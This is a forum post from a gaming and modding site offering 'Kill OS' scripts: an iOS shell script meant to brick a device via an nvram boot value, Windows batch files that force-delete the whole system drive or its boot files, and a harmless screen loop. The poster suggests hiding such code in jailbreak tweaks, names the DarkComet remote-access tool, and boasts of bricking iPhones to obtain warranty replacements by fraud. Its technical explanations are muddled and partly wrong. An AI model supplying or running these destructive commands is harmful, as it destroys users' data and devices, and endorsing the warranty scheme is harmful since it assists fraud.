BullyWiiHacks
Welcome dear guest! Very Happy

To start posting and being part of the BWH community, you simply need to register an account or log into an existing one.

If you do not wish to register at all, that's fine but there will be more advertisements. :/

You can probably see and download most content provided for regular members even without an account.

Your contributions will be greatly appreciated though, give it a shot and register today! thumbsup

Join the forum, it's quick and easy

BullyWiiHacks
Welcome dear guest! Very Happy

To start posting and being part of the BWH community, you simply need to register an account or log into an existing one.

If you do not wish to register at all, that's fine but there will be more advertisements. :/

You can probably see and download most content provided for regular members even without an account.

Your contributions will be greatly appreciated though, give it a shot and register today! thumbsup
BullyWiiHacks
Would you like to react to this message? Create an account in a few clicks or log in to continue.
BullyWiiHacks

Gaming, Modding & Programming

Important reminders:

- Click *HERE* for advanced forum search or check out the text field below on the front page for Google before posting
- NO support via private message (use the forum)
- Write meaningful topic titles
Site Translation
Latest topics
» Dropped Out of College to Pursue Web Dev and Life Pursuits in General
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) EmptyToday at 8:25 am by Bully@WiiPlaza

» Bully Made It Into a BIG Video 400K Views
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) Empty4/7/2024, 6:58 am by Bully@WiiPlaza

» Wii Play Tanks
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) Empty3/24/2024, 2:46 pm by helpmeout

» [Bypass Paywalls] (Global) @magnolia1234 - GitLab
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) Empty3/18/2024, 3:55 am by Seth@WiiPlaza

» [Download] Mary Shelley's Frankenhole
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) Empty3/16/2024, 8:29 am by Seth@WiiPlaza

» Completely Custom Modded Controllers (Undetectable)
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) Empty3/5/2024, 1:55 pm by Shadow@BWH

» (Zombies) Drink perks code?
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) Empty3/5/2024, 1:24 pm by Shadow@BWH

» Die Rückkehr zu STEAM und WARFACE
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) Empty3/2/2024, 3:54 am by Seth@WiiPlaza

» First person hand model change?
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) Empty2/28/2024, 4:53 am by Ad3lamac611

» {RELEASE} Field Raider Firefox v1.72 by Seth@WiiPlaza
Kill OS and Commands! The Next Generation. (iOS, Windows, cmd) Empty2/21/2024, 8:52 am by naxil

Search

Display results as :

Rechercher Advanced Search

May 2024
MonTueWedThuFriSatSun

Calendar Calendar

Country Statistics
Free counters!

You are not connected. Please login or register

Kill OS and Commands! The Next Generation. (iOS, Windows, cmd)

Go down  Message [Page 1 of 1]

negativexclan

negativexclan

***The following codes will no longer make your device boot. This is just for educational purposes only!!! I made only one out of the three which is the Kill iOS. Unfortunately I was in a Private Chat on a gaming website, and Articsn0w(13 yer-old noob) was calling me a phony with jailbreak scripts and coding. Unfortunately I had enough guts to say to him that I code and he said he wanted proof. So I then I gave him a code that I made that messes with the boot up of the device. For example: iPhone 5 apple logo is white by default, you can change it so it may become black. Therefore, if one number is entered incorrectly into the file system, it can cause system madness. Another words, if not done correctly, it can destroy an iOS device and make it become a paper weight. Artic then copied the code and edited it by one number: "E3E4E500000000001 Unfortunatley, because he edited the code to E3E4E100000000001"
He then posted it on idownloadblog.com. Why is it such a big deal? He posted the code on the internet and the script and now people who make Tweaks(improve (a mechanism or system) by making fine adjustments to it) can post it in the script without others knowing, they can install the Tweak(Troll) and it can ruin there iDevice. Again, Not Responsible for any damage! Please use with CAUTION!!!*** This was the first ever threat to Jailbreakers everywhere all because I made a boot up edit. Why won't it boot up? iOS has a special kind of script that doesn't allow any edits when it comes to it's boot up. It's very sensitive. Therefore, it will reject the script and will not know what to do which will cause a bricked iOS Device! Please use it for good and not evil.*****

Kill iOS:

#!/bin/sh
echo "SETTING THIS VALUE INCORRECTLY WILL CAUSE MAD SYSTEM ISSUES."
echo "USE AT YOUR OWN RISK. NO WARRANTY IS PROVIDED."
echo "nvram DClr_override=00020000D8D9D700E3E4E10000000001"
killall SpringBoard
exit 0

-Kills iOS so your iDevice will not turn on-

Kill PC(Windows):

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

-Save as .bat file-
-Will turn off PC and not be able to turn it back on-

2.   Kill PC(Windows)

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Matrix (Windows) cmd:

@echo off
pause
color A
mode 1000

:matrix
echo %random%%random%%random%%random%%random%­%random%%random%%random%%random%%random%­%random%%random%%random%%random%%random%­%random%%random%%random%%random%%random%­%random%%random%
goto matrix

Save as .bat file

Comment for more info!

Remember, If you cause Evil, it will only cause chaos in the end for you.

Jailbreak iOS 8.1.3 is Patched! TaiG will Jailbreak iOS 8.2 in May(Or so they say)!

Please visit these two websites to keep informed about the jailbreak.

https://www.youtube.com/channel/UCj34AOIMl_k1fF7hcBkD_dw

http://phonerebel.com/category/news/

xReVoLT - iTheme

Add my (New) Repo: http://www.myrepospace.com/profile/xReVoLT/

Credits for iOS: Builderbro9000, xReVoLT - iTheme(Me)

All have been tested. All have worked 100%. If you use a hacking tool such as CyberDuck or Dark Comet, Please use it responsibly and DO NOT PUT THIS ON OTHER COMPUTERS With a these hacking softwares. OpenSSH and OpenSSL are wireless commands. As well as CyerDuck and Dark Comet.

*I only made KilliOS(BootLogo)*USE THIS RESPONSIBLY!!!*

Example:

Run KilliOS Script, (IT KILLS YOUR iDevice SO IT WON'T EVEN TURN ON) give it to Apple(With a Warranty!). Geniuses will not know what's wrong with it. Gives new iDevice to you if under Warranty. Tested this twice. Broke 2 iPhone 6's and got 2 New iPhone 6's Razz Geniuses don't know what to do. They'll give new iDevice LMAO. And yes, this actually Happened.

Last edited by negativexclan on 2/22/2015, 10:28 am; edited 3 times in total (Reason for editing : Fix Scripts)

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum